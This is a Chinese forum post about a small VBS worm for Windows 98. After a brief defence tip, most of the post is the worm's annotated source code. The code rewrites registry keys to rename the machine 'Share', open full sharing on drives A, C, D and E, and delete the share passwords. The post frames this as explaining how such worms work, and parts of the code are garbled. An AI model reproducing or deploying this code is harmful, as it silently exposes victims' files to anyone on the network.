network.vbs这是一个不到1k的蠕虫病毒,作用是程序执行后会在那台电脑上完全打开共享,如果那那台电脑是局部网的一台电脑的 话,那程序还可以不断向我扩展,将自己复制到其它电脑上并打开共享,可以由局部网的电脑上入侵到主机的,然后在主机中打开共享,要入侵就变得很容易了!程序打开的共享要等机器重新启动后才会生效。简单防治方法:
打开你的IE,在view(查看)下选Folder options(文件夹参数)-->File type(文件类型)
然后打到以VBS结尾的那种文件,默认下那种文件是使用wscript.exe来打开的,你只
要改成用notepad.exe来打开的话,那就不会感染蠕虫的了。
这种VBS程序的一般原理:
很多人有时候为了方便,会在Win98的“网络”属性——“配置”的“文件及打印共享”项的“允许其他用户访问我的文件”和“允许其他计算机使用我的打印机”前面打上小勾,然后在硬盘“共享”里面的“根据密码访问” 设置一个只读或完全访问的密码,以为这样就可以万无一失了;其实,有心人只要写一个vbs的小程序,当你在不知晓的情况下运行,就可以使你的Win98系统不受密码的保护,完全暴露在网络上,这样,别人就可以在你的计算机里随意阅读、增删文件,胡作非为了。
这个vbs小程序通过修改Win98的注册表实现:On error resume next ‘假如出现错误,跳到下一行执行
Set wscr=CreateObject("wscript.sh*ll") ‘建立wscript调用模式wscr.regwrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ComputerName
\ComputerName","Share" ‘将计算机名修改为“Share”wscr.regwrite "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\VNETSUP
\ComputerName","Share" ‘将计算机名修改为“Share”
for i=1 to 4 ‘循环4次
if i=1 then ‘ 第一次循环
DriveName="A" ‘驱动器名为“A”
else if i=2 then ‘第二次循环
DriveName="C" ‘驱动器名为“C”
else if i=3 then ‘第三次循环
DriveName="D" ‘驱动器名为“D”
else if i=4 then ‘第四次循环
DriveName="E" ‘驱动器名为“E”
end if
end if
end if
end if
wscr.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\" &DriveName& "\Flags",402,"REG_DWORD" 亚魍耆蚕?br>
wscr.regDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network
\LanMan\" & DriveName &"\Parm1enc" ‘删除驱动器完全访问密码
wscr.regDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network
\LanMan\" & DriveName &"\Parm2enc" ‘删除驱动器只读密码
wscr.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network
\LanMan\" & DriveName &"\Path",DriveName&":\" ‘设置访问路径
wscr.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network
\LanMan\" & DriveName &"\Remark","Share" ‘设置驱动器共享注释
wscr.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network
\LanMan\" & DriveName &"\Type",0,"REG_DWORD" ‘ 设置驱动器类型next
当运行以上这个vbs程序并重启你的计算机后,你会发现你的软盘A、硬盘(或光驱)C、D、E已全部共享,在你接入网络后,别人用网络工具查找“Share”的计算机,进入你的计算机后,你的资源便可以让别人任意使用了,而你却毫不知情……~_~
------------------
如果雨天之后是雨天,伤心过后是伤心,那么别离之后的别离就让我们从容的面对
木马使我为爱折断翅膀……
wwwpop3.tongtu.net
适于打印的主题视图